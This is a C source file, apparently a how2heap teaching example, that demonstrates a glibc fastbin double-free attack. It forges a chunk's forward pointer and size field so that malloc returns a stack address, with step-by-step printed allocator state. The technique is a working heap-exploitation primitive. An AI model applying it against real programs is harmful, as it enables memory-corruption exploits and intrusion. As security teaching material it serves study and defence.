#include <stdio.h>
#include <stdlib.h>
/*
 * Demonstration of fastbin "double free" leading to malloc() returning a
 * pointer into the stack (a how2heap teaching example, built on fastbin_dup.c).
 *
 * The sequence below only works against glibc builds whose small allocations
 * are served from fastbins with no tcache in front of them, and whose free-list
 * pointers are stored unmangled; newer glibc (tcache, safe-linking) changes or
 * blocks several of these steps — confirm against the target libc before
 * drawing conclusions from a run. Every step's allocator state is printed so
 * the reader can follow the free list by hand.
 *
 * Return: 0 (implicit for main in C99 and later); the program aborts instead
 * if the allocator detects the corruption.
 */
int main()
{
    printf("This file extends on fastbin_dup.c by tricking malloc into\n"
    "returning a pointer to a controlled location (in this case, the stack).\n");

    /* Stack-resident "fake chunk": on glibc's chunk layout the size field sits
     * 8 bytes after the chunk start and user data 16 bytes after it, so with
     * stack_var playing the size field the user pointer is &stack_var + 8
     * (this matches the address written into the free list below). */
    unsigned long long stack_var;

    printf("The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

    /* Three 8-byte requests: on 64-bit glibc these are 0x20-byte fastbin
     * chunks, which is why the fake size written later is 0x20.
     * Allocation results are not checked — acceptable for a demo only. */
    printf("Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    printf("1st malloc(8): %p\n", a);
    printf("2nd malloc(8): %p\n", b);
    printf("3rd malloc(8): %p\n", c);

    /* free list after this: [ a ] */
    printf("Freeing the first one...\n");
    free(a);

    /* glibc's fastbin free path checks whether the chunk being freed is already
     * at the head of its bin ("double free or corruption (fasttop)"), so an
     * immediate second free(a) is caught. That check is the only double-free
     * defence fastbins have, and it sees just the top entry. */
    printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    /* free list after this: [ b, a ] */
    printf("So, instead, we'll free %p.\n", b);
    free(b);

    /* a is no longer at the head, so the top-of-bin check passes and the same
     * chunk is now on the list twice: [ a, b, a ] */
    printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    printf("Now the free list has [ %p, %p, %p ]. We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);

    /* d receives the first a; the list is now [ b, a ], so a is simultaneously
     * in use (through d) and free. Writing through d therefore writes into a
     * free chunk's header region — specifically its forward pointer. */
    unsigned long long *d = malloc(8);

    printf("1st malloc(8): %p\n", d);
    printf("2nd malloc(8): %p\n", malloc(8));          /* returns b; list: [ a ] */
    printf("Now the free list has [ %p ].\n", a);

    printf("Now, we have access to %p while it remains at the head of the free list.\n"
    "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
    "so that malloc will think there is a free chunk there and agree to\n"
    "return a pointer to it.\n", a);

    /* Fake size field: fastbin allocation validates that the candidate chunk's
     * size belongs to the bin being served, so the value must match the 0x20
     * chunk size of these allocations or malloc aborts. */
    stack_var = 0x20;

    printf("Now, we overwrite the first 8 bytes of the data at %p to point right after the 0x20.\n", a);

    /* d == a, and a free fastbin chunk keeps its forward pointer in the first
     * 8 bytes of user data; this sets a's fd to the fake chunk start, which is
     * sizeof(d) (8 on 64-bit) bytes before stack_var so that stack_var lands
     * in the size field. Newer glibc mangles fd (safe-linking), which is what
     * makes this raw-pointer write ineffective there. */
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

    /* Returns a and promotes a's (forged) fd to the head of the free list. */
    printf("3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));

    /* Returns the stack address printed at the start (&stack_var + 8). */
    printf("4rd malloc(8): %p\n", malloc(8));
}